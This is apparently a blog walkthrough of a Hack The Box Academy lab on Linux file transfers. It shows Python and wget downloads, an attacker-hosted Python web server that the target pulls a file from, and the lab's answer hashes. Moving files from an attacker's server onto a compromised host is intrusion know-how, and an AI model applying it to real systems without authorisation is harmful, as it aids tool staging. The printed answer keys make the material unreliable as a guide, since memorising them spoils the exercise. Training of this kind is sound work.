Linux File Transfer Methods — File Transfers Module — HTB Walk-Through

The Malware Mender
Jul 3, 2024

TIER 0 MODULE: FILE TRANSFERS

SECTION: Linux File Transfer Methods

Open your Pwnbox or connect to the VPN to complete the tasks.

If you are not registered in HTB Academy, then use this link to register now: https://referral.hackthebox.com/mzxKOJt

1. Download the file flag.txt from the web root using Python from the Pwnbox. Submit the contents of the file as your answer.

import requests
# Fetch flag.txt from the target's web root and save it locally.
# Make sure you delete any previous flag.txt file first.
open("flag.txt", "wb").write(requests.get("http://<target-ip>/flag.txt").content)

After the download succeeds, view the contents of the file.

cat flag.txt

Answer: 5d21cf3da9c0ccb94f709e2559f3ea50

2. Upload the attached file named upload_nix.zip to the target using the method of your choice. Once uploaded, SSH to the box, extract the file, and run “hasher <extracted file>” from the command line. Submit the generated hash as your answer.

Download the file to the attacker machine:

wget https://academy.hackthebox.com/storage/modules/24/upload_nix.zip

SSH to the target:

ssh htb-user@<target-ip>

I tried to wget the file from the target machine, but it was not permitted. So, I set up a web server via Python on my attacker machine.

python3 -m http.server

Then I accessed the “Python Server” from the target machine, and downloaded the upload_nix.zip via wget.

wget <attacker-ip>:8000/upload_nix.zip
# Run this command on the target machine.

After a successful download, I extracted it via gunzip:

gunzip -S .zip upload_nix.zip

Finally, check the hash:

# gunzip -S .zip strips the .zip suffix, so the extracted file is named upload_nix.
hasher upload_nix

Answer: 159cfe5c65054bbadb2761cfa359c8b0
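
The second task combines a Python web server, a download, and a hash check. The sketch below is an added example, not code from the module or from this walkthrough; it runs the same flow on the loopback interface and confirms the received file matches the source. The file name, the payload, and the use of SHA-256 are assumptions made for the example (the page does not say which algorithm hasher uses).

```python
import functools
import hashlib
import http.server
import pathlib
import tempfile
import threading
import urllib.request


class QuietHandler(http.server.SimpleHTTPRequestHandler):
    def log_message(self, *args):  # keep the demo output clean
        pass


def sha256_of(path, chunk=65536):
    """Stream the file through SHA-256 so large files are not read into memory."""
    digest = hashlib.sha256()
    with open(path, "rb") as fh:
        for block in iter(lambda: fh.read(chunk), b""):
            digest.update(block)
    return digest.hexdigest()


def transfer_and_verify(payload, name="sample.bin"):
    """Serve payload over HTTP, download it, return (source, received) digests."""
    with tempfile.TemporaryDirectory() as stage, tempfile.TemporaryDirectory() as dest:
        src, out = pathlib.Path(stage, name), pathlib.Path(dest, name)
        src.write_bytes(payload)
        # Serve only the staging directory on one address (port 0 = any free
        # port), instead of the current directory on every interface.
        handler = functools.partial(QuietHandler, directory=stage)
        with http.server.ThreadingHTTPServer(("127.0.0.1", 0), handler) as srv:
            threading.Thread(target=srv.serve_forever, daemon=True).start()
            try:
                url = f"http://127.0.0.1:{srv.server_address[1]}/{name}"
                # Ignore proxy environment variables for this local fetch.
                opener = urllib.request.build_opener(urllib.request.ProxyHandler({}))
                with opener.open(url, timeout=5) as resp:
                    out.write_bytes(resp.read())
            finally:
                srv.shutdown()
        return sha256_of(src), sha256_of(out)


if __name__ == "__main__":
    # Constructed sample payload, not the module's file.
    sent, received = transfer_and_verify(b"constructed sample payload\n" * 100)
    print("match" if sent == received else "MISMATCH", sent)
```

On the command line, `python3 -m http.server --bind <address> --directory <dir>` gives the same scoping: one interface and one directory rather than the whole working directory.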

☣️ HAPPY ETHICAL HACKING ☣️

DISCLAIMER: THIS CONTENT DOES NOT BELONG TO ME, I AM JUST WRITING A WALK-THROUGH OF A FREE MODULE OF HACK THE BOX ACADEMY. (WRITING WALKTHROUGHS OF FREE MODULES IS PERMITTED BY HTB ACADEMY)
